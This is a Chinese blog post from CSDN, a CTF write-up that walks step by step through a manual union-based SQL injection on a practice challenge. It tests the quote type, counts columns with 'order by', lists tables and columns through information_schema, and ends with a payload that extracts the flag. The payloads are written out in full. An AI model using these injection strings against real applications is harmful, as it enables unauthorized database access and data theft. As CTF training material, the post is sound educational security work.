WEB17:SQL注入问题

最新推荐文章于 2024-03-16 18:49:30 发布
最新推荐文章于 2024-03-16 18:49:30 发布
阅读量92 收藏
点赞数
分类专栏: CTF入门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/y17861077326/article/details/113774132
版权

![在这里插入图片描述](https://img-blog.csdnimg.cn/20210209181937805.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3kxNzg2MTA3NzMyNg==,size_16,color_FFFFFF,t_7
思路:
依据常见的判断注入的方法,判断是数字型注入还是字符型注入。

利用 1’ and 1=1# 结果回显,1’ and 1=2# 结果不回显; 得出结论:字符型注入。

然后下边就是字符注入的常见思路了:

通过利用单引号闭合后,引入自己的代码,实现:

  1. 判断有表中有几个字段 order by
    eg: order by 3 根据第三列字段排序

输入 1’ order by 1~4 # 可以显示数据,而1’ order by 5#不行,说明有四列字段
在这里插入图片描述

  1. 试探有哪些字段会被在前端使用放到界面显示(判断回显),

在这里插入图片描述
说明4个字段都被回显,而且也知道了对应字段所回显的位置

注: select 1,2,3,4 返回的就是1 2 3 4
select 1,2,3,4 from 某表 返回该表的内容,只不过所有内容都被1,2,3,4替换
例如:在这里插入图片描述

  1. 当前数据库名查询, 利用database()函数

在这里插入图片描述

  1. 查询当前数据库里有哪些表,查询表中的字段名,查询表中某个字段的内容。

以mysql为例,所有数据的信息都存储在mysql自带的information_schema数据库中

information_schema有有很多表,这道题中我们用到两个,columns表和tables表
在这里插入图片描述

columns表存储着所有列的名字,以及其所在的表命,所在的数据库名
在这里插入图片描述
tables表中存储着所有表名,以及该表所在的数据库的名字
在这里插入图片描述

所以,我们通过database()获得数据库名为skctf,然后在information_schema数据库的tables表中找到skctf的所有表名,并把它们放到一行显示(这里要用到group_concat函数)

0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf'  #

可知,skctf数据库中有两个表 fl4g,sc
在这里插入图片描述

然后,在information_schema的columns表中,找出fl4g表的所有字段,并把它们放在一行显示。

0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'  #

可知,有一个字段,名字为skctf_flag
在这里插入图片描述

最后一步就是查询fl4g表种的skctf_flag字段的值,刚好该表只有一条记录,所以直接查询即可

0' union select 1,2,3,skctf_flag from fl4g #

在这里插入图片描述

不想带绿帽子的白帽子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5214
Ctfhub解题 web SQL注入
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
CTF-Web17(涉及手工,脚本,工具注入)
→_→
09-17 375
17.简单的sql注入之3 分析: 手工注入: 首先先作判断: 正常情况下输入?id=1,页面正常输出hello,?id=0页面不输出 输入?id=’页面直接报SQL语法错误 输入?id=1 and 1=2页面正常 ?id=1' and '1'='2 页面无输出可以看出,这个是字符型SQL注入,未过滤引号和and,条件正确的情况下输出hello,错误无输出,比起SQL盲注,好 像又多了语法报错 猜解表 ?id=1' and (select count(*) from 表名)>0 .
Web渗透测试 SQL报错注入
Memory1011的博客
10-23 88
转自:http://www.pinlue.com/article/2020/10/1419/5711294358347.html
常见的Web漏洞——SQL注入
江左盟的博客
06-25 12万+
目录 SQL注入简介 SQL注入原理 SQL注入分类及判断 SQL注入方法 联合查询注入 基于bool的盲注 基于时间的盲注 总结 SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库My...
sql注入,一个例子让你知道什么是sql注入
qq_41246635的博客
08-03 1万+
sql注入,一个例子让你知道什么是sql注入 这篇文章说的非常好 https://www.cnblogs.com/sdya/p/4568548.html 我就是按照文中例子,亲自在我之前用final框架做的项目中,操作了一遍,的确是实现了用户登录。 在不知道用户名和密码的情况下实现了用户登录 重现sql注入过程如下: 1、在用户名输入' or 1=1 --,然后随便输入一个密码 ...
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
Web安全:SQL注入漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
04-20 2493
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。
Web安全:SQL注入工具
滴水石穿
06-17 7450
SQL注入工具主要是针对Web服务器后台数据库的注入,其主要目的是获取数据库中的数据。以前常用的SQL注入工具有啊D注入工具及Domain(明小子注入工具),现在常用的SQL注入工具有HackBar、SQLMap、Pangolin、Havij、Safe3 SQL injector及超级SQL注入工具等。 1、HackBar HackBar是专门用来进行手动安全测试的浏览器插件(例如手动测试SQL注入漏洞),如图1所示。 图1 HackBar 下载HackBar插件链接:https://git..
web安全——sql注入漏洞详解
最新发布
weixin_61967363的博客
03-16 1438
sql注入漏洞知识讲解到检查流程总结
13 WEB漏洞:SQL注入之MYSQL注入
qq_52718293的博客
04-29 2099
SQL 是一门 ANSI 的标准计算机语言,用来访问和操作数据库系统-。SQL 语句用于取回和更新数据库中的数据。SQL 可与数据库程序协同工作,比如 MS Access、DB2、Informix、MS SQL Server、Oracle、Sybase 以及其他数据库系统。本来有一些基础知识有在sql注入小总里写,现在还是再提一下: information_schema.tables:记录所有表名信息的表 information_schema.columns:记录所有列名信息的表 table_name:表名
Web应用安全:SQL注入的辅助性对策.pptx
06-20
SQL注入是一种常见的网络安全威胁,针对Web应用程序,尤其是那些依赖数据库存储和检索信息的系统。攻击者通过构造恶意的SQL查询,插入到用户输入字段中,从而控制或操纵数据库,获取敏感信息,甚至对数据进行修改。...
Web安全开发:SQL注入攻击和网页挂马.pdf
09-19
"Web安全开发:SQL注入攻击和网页挂马" 在Web应用程序中,安全是最重要的考虑因素之一。SQL注入攻击和网页挂马是两种常见的Web安全威胁,了解它们对Web安全的影响至关重要。下面我们将详细介绍SQL注入攻击和网页...
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
计算机病毒与防护:SQL注入原理.ppt
06-10
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的Web应用程序。这种攻击手段是由于应用程序在处理用户输入时没有进行充分的验证和过滤,使得攻击者可以插入恶意的SQL代码,从而控制或操纵...
各种编码初略认识
y17861077326的博客
12-14 1万+
Base64 Base64就是一种基于64个可打印字符来表示二进制数据的方法。 Base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。采用Base64编码具有不可读性,需要解码后才能阅读。 编码后的结果: 比如这种:“6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogTkRNMk5qWXg=” 具体Base64作用以及其他细节,有时间补充。 ...
web12:本地管理员(http请求,伪造IP,XFF字段)
y17861077326的博客
02-02 2556
这道题,提示是IP禁止访问。看了答案以后,说是伪造本地IP。 不允许外来IP访问,那么应该就是本地IP可以访问了,本地IP又称回送地址,用于本地软件测试,进程间通信。 伪造本地IP的方法是在http头上加一个字段X-Forwarded-For:127.0.0.1 另外在网页源码里有一串Base64字符,解码后是test123 管理员系统的账号常为admin,所以猜test123是其密码。 所以伪造http头,加一个字段伪造来源为本地IP即可破解题目。 ...
浏览器查看源代码和F12审查元素的区别
y17861077326的博客
05-25 1970
查看源代码就是查看服务器发给浏览器的原封不动的代码。 审查元素是,浏览器执行完源代码里的js代码后的最终结果。 “审查元素”包括源代码+js动态渲染的内容,即最终展示的html内容。 在做WEB CTF题的时候,遇到过一道题,就是 访问1p.html, 直接访问就会跳转到另一个页面。如果是查看源代码,就不会跳转。应该是源代码里有跳转页面的JS代码被执行了。 参考自https://blog.csdn.net/u010865136/article/details/109857046 ...
模板注入漏洞
y17861077326的博客
04-07 1270
SSTI(Server-Side TemplateInjection)服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的。此种类型漏洞虽然多次在CTF中,以Python语言为载体出现,但是这并不是Python模板引擎独有的漏洞。 值得注意的是: 凡是使用模板的地方都可能会出现SSTI的问题,SSTI不属于任何一种语言。 jinja2原理 以下内容,以Python的模板引擎Jinja2为例。 from flask import
揭秘WEB安全:SQL注入漏洞全解析与防护策略
SQL注入Web安全领域的重要概念,它是指黑客利用应用程序中对用户输入的敏感信息处理不当,构造特殊请求,使得Web应用在执行数据库查询时插入恶意SQL语句,从而获取、修改或控制数据库信息的一种攻击方式。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值